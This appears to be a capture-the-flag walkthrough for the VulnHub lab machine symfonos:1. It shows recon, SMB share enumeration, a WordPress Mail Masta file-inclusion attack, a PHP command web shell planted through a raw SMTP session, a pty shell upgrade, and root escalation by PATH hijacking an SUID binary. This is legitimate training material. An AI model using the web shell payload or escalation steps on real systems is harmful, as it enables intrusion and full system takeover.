Name
- Name: symfonos: 1
- Date release: 29 Jun 2019
- Author: Zayotic
- Series: symfonos
- Web page: https://blog.zay.li/symfonos-1-boot2root-ctf/
Download
- symfonos1.7z (Size: 739 MB)
- Download: https://drive.google.com/uc?id=1cb7qvWhdg8oyAQw43fm1ZMLjx2Jr3Ga-&export=download
- Download (Mirror): https://download.vulnhub.com/symfonos/symfonos1.7z
- Download (Torrent): https://download.vulnhub.com/symfonos/symfonos1.7z.torrent
Information gathering
root@kali:~# nmap 192.168.243.158 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-26 06:27 EST
Nmap scan report for 192.168.243.158
Host is up (0.00052s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B7:E0:15 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2020-12-26T05:27:58-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-26 06:27:59
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.243.158
Visit port 80
Checking robots.txt turns up nothing
Directory enumeration
root@kali:~# dirb http://192.168.243.158/
---- Entering directory: http://192.168.243.158/manual/ ----
==> DIRECTORY: http://192.168.243.158/manual/da/
==> DIRECTORY: http://192.168.243.158/manual/de/
==> DIRECTORY: http://192.168.243.158/manual/en/
==> DIRECTORY: http://192.168.243.158/manual/es/
==> DIRECTORY: http://192.168.243.158/manual/fr/
==> DIRECTORY: http://192.168.243.158/manual/images/
+ http://192.168.243.158/manual/index.html (CODE:200|SIZE:626)
==> DIRECTORY: http://192.168.243.158/manual/ja/
==> DIRECTORY: http://192.168.243.158/manual/ko/
==> DIRECTORY: http://192.168.243.158/manual/style/
==> DIRECTORY: http://192.168.243.158/manual/tr/
==> DIRECTORY: http://192.168.243.158/manual/zh-cn/
SMB is exposed on ports 139 and 445
root@kali:~# enum4linux 192.168.243.158
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
Users found: helios anonymous
root@kali:~# smbclient //192.168.243.158/anonymous
Download the files
smb: \> get attention.txt
root@kali:~# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
root@kali:~# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@kali:~# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
The "Work on /h3l105" entry reveals a path
http://symfonos.local/h3l105/index.php/2019/06/29/hello-world/
File inclusion through a vulnerable WordPress plugin
root@kali:~# wpscan -u http://symfonos.local/h3l105/
mail-masta
root@kali:~# searchsploit mail masta
File inclusion
Viewing the mail file
Writing the webshell through port 25 (SMTP)
root@kali:~# telnet 192.168.243.158 25
Trying 192.168.243.158...
Connected to 192.168.243.158.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
ls
502 5.5.2 Error: command not recognized
dir
502 5.5.2 Error: command not recognized
mail from:ceshi
250 2.1.0 Ok
rcpt to:[email protected]
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']);?>.
250 2.0.0 Ok: queued as 4859A408A1
quit
221 2.0.0 Bye
Connection closed by foreign host.
From [email protected] Sat Dec 26 06:46:05 2020 Return-Path: X-Original-To: [email protected] Delivered-To: [email protected] Received: from unknown (unknown [192.168.243.133]) by symfonos.localdomain (Postfix) with SMTP id 4859A408A1 for ; Sat, 26 Dec 2020 06:43:39 -0600 (CST)
Get a reverse shell with nc
Interactive shell with Python
python -c "import pty;pty.spawn('/bin/bash')"
List SUID executables
<inc/campaign$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
Privilege escalation through the PATH variable
/opt$ strings statuscheck
proof.txt
helios@symfonos:/opt$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh">curl
echo "/bin/sh">curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp/:$PATH
export PATH=/tmp/:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root
# cat proof.txt
cat proof.txt
cat: proof.txt: No such file or directory
# cat /root/proof.txt
cat /root/proof.txt
Congrats on rooting symfonos:1!
=/[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\